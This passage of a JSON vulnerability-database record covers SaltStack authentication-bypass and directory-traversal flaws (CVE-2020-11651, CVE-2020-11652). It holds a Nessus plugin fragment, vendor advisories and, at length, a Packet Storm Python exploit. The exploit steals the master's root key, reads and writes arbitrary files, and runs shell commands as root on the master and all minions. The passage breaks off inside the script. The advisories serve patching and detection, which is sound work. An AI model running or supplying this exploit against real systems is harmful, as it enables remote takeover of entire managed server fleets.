script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.1.1', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.1.1 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.1.1', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.1.1 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2021-12-30T12:26:01", "description": "An authentication bypass vulnerability was discovered in SaltStack Salt. An attacker may exploit the vulnerability to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (Vulnerability ID: HWPSIRT-2020-05592)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11651.\n\nA directory traversal vulnerability was discovered in SaltStack Salt. 
The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. An authenticated attacker may exploit this vulnerability to access any directories. (Vulnerability ID: HWPSIRT-2020-05594)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-11652.\n\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200715-01-salt-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200715-01-salt-en>)\n\n \n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-15T00:00:00", "type": "huawei", "title": "Security Advisory - Two Vulnerabilities in SaltStack Salt", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-07-15T00:00:00", "id": "HUAWEI-SA-20200715-01-SALT", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200715-01-salt-en", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-11-08T04:09:48", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-564=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "OPENSUSE-SU-2020:0564-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/SSOLZPKWSWDPR4VMI5Q3QMPA72BQNRCM/", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T04:09:41", "description": "An update that solves four vulnerabilities and has 7 fixes\n is now available.\n\nDescription:\n\n This update for salt contains the following fixes:\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n - Require python3-distro only for TW (bsc#1173072)\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/3000.html\n\n - Add docker.logout to docker execution module. (bsc#1165572)\n - Add option to enable/disable force refresh for zypper.\n - Add publish_batch to ClearFuncs exposed methods.\n - Adds test for zypper abbreviation fix.\n - Avoid segfault from \"salt-api\" under certain conditions of heavy load\n managing SSH minions. (bsc#1169604)\n - Avoid traceback on debug logging for swarm module. (bsc#1172075)\n - Batch mode now also correctly provides return value. (bsc#1168340)\n - Better import cache handline.\n - Do not make file.recurse state to fail when msgpack 0.5.4. (bsc#1167437)\n - Do not require vendored backports-abc. (bsc#1170288)\n - Fix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n - Fix for low rpm_lowpkg unit test.\n - Fix for temp folder definition in loader unit test.\n - Fix for unless requisite when pip is not installed.\n - Fix integration test failure for test_mod_del_repo_multiline_values.\n - Fix regression in service states with reload argument.\n - Fix tornado imports and missing _utils after rebasing patches.\n - Fix status attribute issue in aptpkg test.\n - Improved storage pool or network handling.\n - loop: fix variable names for until_no_eval.\n - Make \"salt.ext.tornado.gen\" to use \"salt.ext.backports_abc\" on Python 2.\n - Make setup.py script not to require setuptools greater than 9.1.\n - More robust remote port detection.\n - Prevent sporious \"salt-api\" stuck processes when managing SSH minions.\n because of logging deadlock. 
(bsc#1159284)\n - Python3.8 compatibility changes.\n - Removes unresolved merge conflict in yumpkg module.\n - Returns a the list of IPs filtered by the optional network list.\n - Revert broken changes to slspath made on Salt 3000\n (saltstack/salt#56341). (bsc#1170104)\n - Sanitize grains loaded from roster_grains.json cache during \"state.pkg\".\n - Various virt backports from 3000.2.\n - zypperpkg: filter patterns that start with dot. (bsc#1171906)\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1074=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-26T00:00:00", "type": "suse", "title": "Security update for salt (moderate)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": 
"2020-07-26T00:00:00", "id": "OPENSUSE-SU-2020:1074-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6GW2K66LI6CQMXXR5ABJWHGQK64P5J5Y/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-08T04:09:03", "description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, 
bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-899=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-06-23T00:00:00", "id": "OPENSUSE-SU-2021:0899-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/6E3YAO2VV3WBUS7PMAT26ZYDS3AXW5VL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-06T17:58:39", 
"description": "An update that solves 7 vulnerabilities, contains three\n features and has three fixes is now available.\n\nDescription:\n\n This update for salt fixes the following issues:\n\n Update to Salt release version 3002.2 (jsc#ECO-3212, jsc#SLE-18033,\n jsc#SLE-18028)\n\n - Check if dpkgnotify is executable (bsc#1186674)\n - Drop support for Python2. Obsoletes `python2-salt` package\n (jsc#SLE-18028)\n - virt module updates\n * network: handle missing ipv4 netmask attribute\n * more network support\n * PCI/USB host devices passthrough support\n - Set distro requirement to oldest supported version in\n requirements/base.txt\n - Bring missing part of async batch implementation back (CVE-2021-25315,\n bsc#1182382)\n - Always require `python3-distro` (bsc#1182293)\n - Remove deprecated warning that breaks minion execution when\n \"server_id_use_crc\" opts is missing\n - Fix pkg states when DEB package has \"all\" arch\n - Do not force beacons configuration to be a list.\n - Remove msgpack < 1.0.0 from base requirements (bsc#1176293)\n - msgpack support for version >= 1.0.0 (bsc#1171257)\n - Fix issue parsing errors in ansiblegate state module\n - Prevent command injection in the snapper module (bsc#1185281,\n CVE-2021-31607)\n - transactional_update: detect recursion in the executor\n - Add subpackage salt-transactional-update (jsc#SLE-18033)\n - Improvements on \"ansiblegate\" module (bsc#1185092):\n * New methods: ansible.targets / ansible.discover_playbooks\n - Add support for Alibaba Cloud Linux 2 (Aliyun Linux)\n - Regression fix of salt-ssh on processing targets\n - Update target fix for salt-ssh and avoiding race condition on salt-ssh\n event processing (bsc#1179831, bsc#1182281)\n - Add notify beacon for Debian/Ubuntu systems\n - Fix zmq bug that causes salt-call to freeze (bsc#1181368)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n 
Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.3:\n\n zypper in -t patch openSUSE-SLE-15.3-2021-2106=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-11T00:00:00", "type": "suse", "title": "Security update for salt (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25592", "CVE-2021-25315", "CVE-2021-31607"], "modified": "2021-07-11T00:00:00", "id": "OPENSUSE-SU-2021:2106-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MU6P3NIODW6ZMC4HZLBROO6ZEOD5KAUX/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2022-12-22T12:18:43", "description": "On April 29, 2020, the Salt Open Core team notified their community regarding the following two CVE-IDs:\n\nCVE-2020-11651: Authentication Bypass Vulnerability\nCVE-2020-11652: Directory Traversal Vulnerability\n\nCisco Modeling Labs Corporate Edition (CML), Cisco TelePresence IX5000 Series, and Cisco Virtual Internet Routing Lab Personal 
Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities.\n\nCisco has released software updates that address these vulnerabilities. There are workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG\"]", "cvss3": {}, "published": "2020-05-28T16:00:00", "type": "cisco", "title": "SaltStack FrameWork Vulnerabilities Affecting Cisco Products", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-06-16T15:17:35", "id": "CISCO-SA-SALT-2VX545AG", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-salt-2vx545AG", "cvss": {"score": 10.0, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}}], "packetstorm": [{"lastseen": "2020-08-31T07:08:45", "description": "", "cvss3": {}, "published": "2020-05-05T00:00:00", "type": "packetstorm", "title": "Saltstack 3000.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-05-05T00:00:00", "id": "PACKETSTORM:157560", "href": "https://packetstormsecurity.com/files/157560/Saltstack-3000.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Saltstack 3000.1 - Remote Code Execution \n# Date: 2020-05-04 \n# Exploit Author: Jasper Lievisse Adriaanse \n# Vendor Homepage: https://www.saltstack.com/ \n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* \n# Tested on: Debian 10 with Salt 2019.2.0 \n# CVE : CVE-2020-11651 and CVE-2020-11652 \n# Discription: Saltstack authentication bypass/remote code execution \n# \n# Source: https://github.com/jasperla/CVE-2020-11651-poc \n# This exploit is based on this checker script: \n# 
https://github.com/rossengeorgiev/salt-security-backports \n \n#!/usr/bin/env python \n# \n# Exploit for CVE-2020-11651 and CVE-2020-11652 \n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) \n# This exploit is based on this checker script: \n# https://github.com/rossengeorgiev/salt-security-backports \n \nfrom __future__ import absolute_import, print_function, unicode_literals \nimport argparse \nimport datetime \nimport os \nimport os.path \nimport sys \nimport time \n \nimport salt \nimport salt.version \nimport salt.transport.client \nimport salt.exceptions \n \ndef init_minion(master_ip, master_port): \nminion_config = { \n'transport': 'zeromq', \n'pki_dir': '/tmp', \n'id': 'root', \n'log_level': 'debug', \n'master_ip': master_ip, \n'master_port': master_port, \n'auth_timeout': 5, \n'auth_tries': 1, \n'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) \n} \n \nreturn salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') \n \n# --- check funcs ---- \n \ndef check_salt_version(): \nprint(\"[+] Salt version: {}\".format(salt.version.__version__)) \n \nvi = salt.version.__version_info__ \n \nif (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): \nreturn True \nelse: \nreturn False \n \ndef check_connection(master_ip, master_port, channel): \nprint(\"[+] Checking salt-master ({}:{}) status... \".format(master_ip, master_port), end='') \nsys.stdout.flush() \n \n# connection check \ntry: \nchannel.send({'cmd':'ping'}, timeout=2) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"OFFLINE\") \nsys.exit(1) \nelse: \nprint(\"ONLINE\") \n \ndef check_CVE_2020_11651(channel): \nprint(\"[+] Checking if vulnerable to CVE-2020-11651... 
\", end='') \nsys.stdout.flush() \n# try to evil \ntry: \nrets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \npass \nfinally: \nif rets: \nroot_key = rets[2]['root'] \nreturn root_key \n \nreturn None \n \ndef check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read_token)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'cmd': 'get_token', \n'arg': [], \n'token': top_secret_file_path, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"YES\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nprint(\"NO\") \n \ndef check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (read)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': top_secret_file_path, \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return']: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write1(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write1)... 
\", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'path': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'data': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \n \npp(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef check_CVE_2020_11652_write2(debug, channel, root_key): \nprint(\"[+] Checking if vulnerable to CVE-2020-11652 (write2)... \", end='') \nsys.stdout.flush() \n \n# try read file \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'config.update_config', \n'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', \n'yaml_contents': 'evil', \n'saltenv': 'base', \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept salt.exceptions.SaltReqTimeoutError: \nprint(\"TIMEOUT\") \nexcept: \nprint(\"ERROR\") \nraise \nelse: \nif debug: \nprint() \nprint(rets) \nif rets['data']['return'].startswith('Wrote'): \ntry: \nos.remove('/tmp/salt_CVE_2020_11652.conf') \nexcept OSError: \nprint(\"Maybe?\") \nelse: \nprint(\"YES\") \nelse: \nprint(\"NO\") \n \ndef pwn_read_file(channel, root_key, path, master_ip): \nprint(\"[+] Attemping to read {} from {}\".format(path, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.read', \n'path': path, \n'saltenv': 'base', \n} \n \nrets = channel.send(msg, timeout=3) \nprint(rets['data']['return'][0][path]) \n \ndef pwn_upload_file(channel, root_key, src, dest, master_ip): \nprint(\"[+] Attemping to upload {} to {} on {}\".format(src, dest, master_ip)) \nsys.stdout.flush() \n \ntry: \nfh = open(src, 'rb') \npayload = fh.read() \nfh.close() \nexcept 
Exception as e: \nprint('[-] Failed to read {}: {}'.format(src, e)) \nreturn \n \nmsg = { \n'key': root_key, \n'cmd': 'wheel', \n'fun': 'file_roots.write', \n'saltenv': 'base', \n'data': payload, \n'path': dest, \n} \n \nrets = channel.send(msg, timeout=3) \nprint('[ ] {}'.format(rets['data']['return'])) \n \ndef pwn_exec(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute {} on {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': 'runner', \n'fun': 'salt.cmd', \n'saltenv': 'base', \n'user': 'sudo_user', \n'kwarg': { \n'fun': 'cmd.exec_code', \n'lang': 'python', \n'code': \"import subprocess;subprocess.call('{}',shell=True)\".format(cmd) \n}, \n'jid': jid, \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \n \nif rets.get('jid'): \nprint('[+] Successfully scheduled job: {}'.format(rets['jid'])) \n \ndef pwn_exec_all(channel, root_key, cmd, master_ip, jid): \nprint(\"[+] Attemping to execute '{}' on all minions connected to {}\".format(cmd, master_ip)) \nsys.stdout.flush() \n \nmsg = { \n'key': root_key, \n'cmd': '_send_pub', \n'fun': 'cmd.run', \n'user': 'root', \n'arg': [ \"/bin/sh -c '{}'\".format(cmd) ], \n'tgt': '*', \n'tgt_type': 'glob', \n'ret': '', \n'jid': jid \n} \n \ntry: \nrets = channel.send(msg, timeout=3) \nexcept Exception as e: \nprint('[-] Failed to submit job') \nreturn \nfinally: \nif rets == None: \nprint('[+] Successfully submitted job to all minions.') \nelse: \nprint('[-] Failed to submit job') \n \n \ndef main(): \nparser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') \nparser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') \nparser.add_argument('--port', '-p', dest='master_port', default='4506') \nparser.add_argument('--force', '-f', dest='force', default=False, action='store_false') \nparser.add_argument('--debug', '-d', dest='debug', 
default=False, action='store_true') \nparser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') \nparser.add_argument('--read', '-r', dest='read_file') \nparser.add_argument('--upload-src', dest='upload_src') \nparser.add_argument('--upload-dest', dest='upload_dest') \nparser.add_argument('--exec', dest='exec', help='Run a command on the master') \nparser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') \nargs = parser.parse_args() \n \nprint(\"[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.\") \ntime.sleep(1) \n \n# Both src and destination are required for uploads \nif (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): \nprint('[-] Must provide both --upload-src and --upload-dest') \nsys.exit(1) \n \nchannel = init_minion(args.master_ip, args.master_port) \n \nif check_salt_version(): \nprint(\"[ ] This version of salt is vulnerable! Check results below\") \nelif args.force: \nprint(\"[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.\") \nelse: \nsys.exit() \n \ncheck_connection(args.master_ip, args.master_port, channel) \n \nroot_key = check_CVE_2020_11651(channel) \nif root_key: \nprint('\\n[*] root key obtained: {}'.format(root_key)) \nelse: \nprint('[-] Failed to find root key...aborting') \nsys.exit(127) \n \nif args.run_checks: \n# Assuming this check runs on the master itself, create a file with \"secret\" content \n# and abuse CVE-2020-11652 to read it. 
\ntop_secret_file_path = '/tmp/salt_cve_teta' \nwith salt.utils.fopen(top_secret_file_path, 'w') as fd: \nfd.write(\"top secret\") \n \n# Again, this assumes we're running this check on the master itself \nwith salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: \nroot_key = keyfd.read() \n \ncheck_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) \ncheck_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) \ncheck_CVE_2020_11652_write1(debug, channel, root_key) \ncheck_CVE_2020_11652_write2(debug, channel, root_key) \nos.remove(top_secret_file_path) \nsys.exit(0) \n \nif args.read_file: \npwn_read_file(channel, root_key, args.read_file, args.master_ip) \n \nif args.upload_src: \nif os.path.isabs(args.upload_dest): \nprint('[-] Destination path must be relative; aborting') \nsys.exit(1) \npwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) \n \n \njid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) \n \nif args.exec: \npwn_exec(channel, root_key, args.exec, args.master_ip, jid) \n \nif args.exec_all: \nprint(\"[!] Lester, is this what you want? 
